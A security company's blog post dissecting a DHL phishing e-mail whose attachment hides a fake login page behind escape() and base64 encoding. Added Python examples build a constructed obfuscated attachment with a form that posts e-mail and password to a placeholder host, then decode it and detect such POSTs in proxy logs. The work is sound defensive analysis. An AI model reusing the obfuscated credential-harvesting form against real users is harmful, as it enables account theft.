ISSP

Phishing of DHL Accounts

Updated: Jul 20

Phishing is a very common way to acquire personal information such as usernames, passwords or financial information. Today we are going to walk through a real-life example of an elementary phishing e-mail that delivers a fake DHL login page.

DHL phishing case study

Let’s analyze the following e-mail:

[Screenshot: the phishing e-mail from a sender pretending to be DHL]

As you can see from the screenshot, the attachment is an .htm page which the unsuspecting “parcel recipient” is advised to download.

If we look inside this document, we will see JavaScript code containing a Unicode string value encoded with the JavaScript “escape” function:

[Screenshot: the JavaScript code containing the escape()-encoded Unicode string value]

To decode this fragment we can use, for example, the following online resource:

http://scriptasylum.com/tutorials/encode-decode.html

[Screenshot: the decoding process]

After decoding it becomes obvious that this is not the end: the text is still encoded, this time with base64:

[Screenshot: the text that is still base64-encoded]

OK, let’s decode this one as well. The result is the code of a page that runs locally, imitates the official DHL login page and is obviously intended to collect DHL account e-mail addresses and passwords:

[Screenshot: the locally run code of the fake DHL page]
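The two decoding steps above (unescape the JavaScript string, then base64-decode the result) can be done once by hand on a website, but an analyst who sees this kind of attachment regularly wants a script that peels the layers and reports where the decoded page sends the credentials. The following is an added example, not code from the post: it builds a constructed attachment in the same shape the post describes (page, base64, small script wrapper, escape()), peels the layers back off, and extracts the form action and input names. The form action host is a placeholder, not the real phishing resource, and the `js_escape` helper is an imitation of the legacy JavaScript `escape()` written only to build the sample.

```python
import base64
import re

# Constructed sample (not the attachment from the post): a fake login form
# that will be base64-encoded, wrapped in a script and escape()-encoded.
# The form action is a placeholder host, not the real phishing resource.
INNER_HTML = (
    '<form method="post" action="http://PHISHING-HOST-PLACEHOLDER.example/post.php">'
    '<input name="email"><input name="password" type="password">'
    '<input type="submit" value="Login"></form>'
)

ESCAPE_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
BASE64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def js_escape(text: str) -> str:
    """Imitate the legacy JavaScript escape(): A-Z a-z 0-9 @*_+-./ stay as-is,
    other Latin-1 characters become %XX and everything else %uXXXX.
    Used here only to build the sample attachment."""
    out = []
    for ch in text:
        cp = ord(ch)
        if (cp < 128 and ch.isalnum()) or ch in "@*_+-./":
            out.append(ch)
        elif cp < 256:
            out.append(f"%{cp:02X}")
        else:
            out.append(f"%u{cp:04X}")
    return "".join(out)


def js_unescape(text: str) -> str:
    """Inverse of escape(); a single pass so a decoded '%' is never re-decoded."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def peel_layers(blob: str, max_layers: int = 8):
    """Strip alternating escape()/base64 layers and record the order found.
    Base64 is detected as the longest base64-looking run that decodes to UTF-8."""
    layers, cur = [], blob
    for _ in range(max_layers):
        if ESCAPE_RE.search(cur):
            cur = js_unescape(cur)
            layers.append("escape")
            continue
        runs = BASE64_RUN_RE.findall(cur)
        if not runs:
            break
        candidate = max(runs, key=len)
        try:
            decoded = base64.b64decode(candidate, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break
        cur = decoded
        layers.append("base64")
    return cur, layers


def build_sample_attachment() -> str:
    """Build the constructed .htm attachment: page -> base64 -> script wrapper -> escape()."""
    b64 = base64.b64encode(INNER_HTML.encode()).decode()
    wrapper = f'<script>document.write(atob("{b64}"))</script>'
    return f'<script>document.write(unescape("{js_escape(wrapper)}"))</script>'


def analyze_attachment(attachment: str) -> dict:
    """Take the longest string literal in the attachment, peel its layers and
    report where the decoded page posts its form and which fields it collects."""
    literal = max(re.findall(r'"([^"]*)"', attachment), key=len)
    html, layers = peel_layers(literal)
    return {
        "layers": layers,
        "form_actions": re.findall(r'<form[^>]*\baction="([^"]+)"', html, re.I),
        "fields": re.findall(r'<input[^>]*\bname="([^"]+)"', html, re.I),
    }


if __name__ == "__main__":
    print(analyze_attachment(build_sample_attachment()))
```

The layer detection is a heuristic: any `%XX` sequence, including ordinary URL-encoding inside the decoded page, would be treated as one more escape() layer, so the reported `layers` list should be read alongside the decoded HTML rather than trusted on its own. The `form_actions` value is what goes to the firewall block list in the last step of the post.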

Among other things, the body of the page contains a link to the resource:

[Screenshot: the code with the link to the resource]

When you try to visit that resource directly, you are immediately redirected to the DHL website, so a user who checks the link in the browser is reassured that it really is the DHL site and suspects nothing:

[Screenshot: the HTTP traffic]

Judging by the traffic, there is a POST request that transfers the e-mail address and password we entered on the fake page, after which, just as expected, it redirects you to the DHL website.

[Screenshot: the code that redirects to the DHL page]

So what you see here is actual phishing of DHL accounts.
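The traffic pattern just described, a POST carrying a password field to a host that is not the brand's own, answered with a redirect back to the brand's real site, is something a proxy or web-gateway log can be searched for. The following is an added example, not part of the post: it runs that check over a few constructed proxy log lines in a simple assumed format. The brand allowlist (`dhl.com` and its subdomains) and the phishing host are assumptions for the example; the log lines are constructed and not the traffic shown in the screenshots.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist of the brand's own hosts: credentials for this brand
# posted anywhere else are suspect.
BRAND_DOMAINS = ("dhl.com",)
CREDENTIAL_FIELDS = {"password", "passwd", "pass", "pwd"}

# Constructed proxy log lines (not the traffic from the post). Assumed format:
# <timestamp> <method> <url> <status> location=<url or -> body=<form body or ->
SAMPLE_LOG = """\
2020-07-20T10:00:01Z GET http://PHISHING-HOST-PLACEHOLDER.example/ 302 location=https://www.dhl.com/ body=-
2020-07-20T10:00:09Z POST http://PHISHING-HOST-PLACEHOLDER.example/post.php 302 location=https://www.dhl.com/ body=email=victim%40example.com&password=hunter2
2020-07-20T10:00:10Z GET https://www.dhl.com/ 200 location=- body=-
2020-07-20T10:05:00Z POST https://www.dhl.com/login 200 location=- body=email=user%40example.com&password=secret
2020-07-20T10:06:00Z POST http://intranet.example/search 200 location=- body=q=parcel
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3}) location=(\S+) body=(\S+)$")


def is_brand_host(host: str) -> bool:
    """True for the brand's apex domain or any of its subdomains."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS)


def parse_line(line: str):
    """Parse one log line of the assumed format into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, method, url, status, location, body = m.groups()
    return {
        "ts": ts,
        "method": method,
        "url": url,
        "status": int(status),
        "location": None if location == "-" else location,
        "body": None if body == "-" else body,
    }


def find_credential_harvesting(log_text: str) -> list:
    """Flag POSTs that carry a password-like field to a non-brand host.
    A 3xx answer whose Location points at the brand site raises the severity,
    because that is exactly the fake-page-then-redirect pattern in the post."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["body"] is None:
            continue
        fields = set(parse_qs(rec["body"], keep_blank_values=True))
        cred_fields = fields & CREDENTIAL_FIELDS
        if not cred_fields:
            continue
        dst = urlsplit(rec["url"]).hostname or ""
        if is_brand_host(dst):
            continue  # credentials going to the brand itself: not this pattern
        redirect_to_brand = (
            300 <= rec["status"] < 400
            and rec["location"] is not None
            and is_brand_host(urlsplit(rec["location"]).hostname or "")
        )
        alerts.append({
            "ts": rec["ts"],
            "host": dst,
            "fields": sorted(cred_fields),
            "redirect_to_brand": redirect_to_brand,
            "severity": "high" if redirect_to_brand else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_credential_harvesting(SAMPLE_LOG):
        print(alert)
```

On the constructed log only the POST to the placeholder host is flagged: the legitimate login POST to `www.dhl.com` is skipped by the allowlist, and the intranet search POST carries no credential-like field. In a real deployment the body would usually not be logged in clear, so the check would key on the field names from a request-logging proxy or on the page's form action extracted during attachment analysis, and the flagged host is the one to block on the firewall.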

All that is left to do is to block the link on the firewalls and once again remind users to be very suspicious of such attachments and to double-check any link that asks for their password.

If you wish to learn more about ISSP Reverse Engineering services, please contact us using the form below.
